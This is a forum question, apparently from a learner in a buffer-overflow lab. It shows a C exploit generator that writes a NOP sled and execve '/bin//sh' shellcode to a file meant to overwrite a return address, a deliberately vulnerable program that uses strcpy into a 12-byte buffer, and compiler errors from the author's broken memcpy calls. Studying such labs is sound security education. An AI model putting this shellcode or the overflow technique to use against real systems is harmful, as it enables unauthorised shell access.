I am new to buffer overflow; I'm trying to overflow a 517 byte buffer. Using gdb to debug the program, I know that it takes 533 bytes to overflow the ebp and 537 to overflow the eip. I am attempting to fill the buffer with NOPs and shellcode. The input is placed into a "malicious file" and a stack.c program places the information on the stack. I'm trying to overflow the buffer such that I can get the pointer to point to my shellcode in order to run it. Below are my programs, but I am getting some errors with how I am using memcpy to put the NOPs and shellcode into the buffer.
Code:
//VULNERABLE FILE exploit.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x68""//sh" // pushl $0x68732f2f
"\x68""/bin" // pushl $0x6e69622f
"\x89\xe3" // movl %esp,%ebx
"\x50" // pushl %eax
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\x99" // cdql
"\xb0\x0b" // movb $0x0b,%al
"\xcd\x80" // int $0x80
;
long get_esp(void){
__asm__("movl %esp, %eax");//attempting to get the stack pointer address
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *maliciousfile;
long addr;
addr = get_esp();
// Initialize buffer with 0x90 (NOP instruction)
memset(&buffer, 0x90, 517);
// filling buffer with appropriate contents here
memcpy(&buffer, 0x90, buffer-strlen(shellcode)); //trying to add NOPs to the buffer
memcpy(&buffer + buffer-strlen(shellcode), shellcode, strlen(shellcode)); //trying to add shellcode to the buffer
long *ptr = (long *)(buffer+8); /*not sure about this part either - buffer is 517 bytes, buffer+4=521 and location of EBP, buffer+8=525 is return address. I'm attempting to place the pointer and subsequently the esp address at the return address in order to read the shellcode*/
*ptr = addr; //make eip point to shellcode address
// Save the contents to the file "malicious file"
maliciousfile = fopen("./malicious", "w");
fwrite(buffer, 517, 1, maliciousfile);
fclose(maliciousfile);
}
//STACK FILE
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
int bof(char *str)
{
char buffer[12];
//statement has a buffer overflow problem
strcpy(buffer, str);
return 1;
}
int main(int argc, char *argv)
{
char str[517];
FILE *maliciousfile;
badfile = fopen("maliciousfile", "r");
fread(str, sizeof(char), 517, maliciousfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
ERRORS
exploit.c: In function ‘main’:
exploit.c:34:30: error: invalid operands to binary - (have ‘char *’ and ‘void *’)
exploit.c:34:2: warning: passing argument 2 of ‘memcpy’ makes pointer from integer without a cast
/usr/include/string.h:44:14: note: expected ‘const void * __restrict__’ but argument is of type ‘int’
exploit.c:35:17: error: invalid operands to binary + (have ‘char (*)[517]’ and ‘char *’)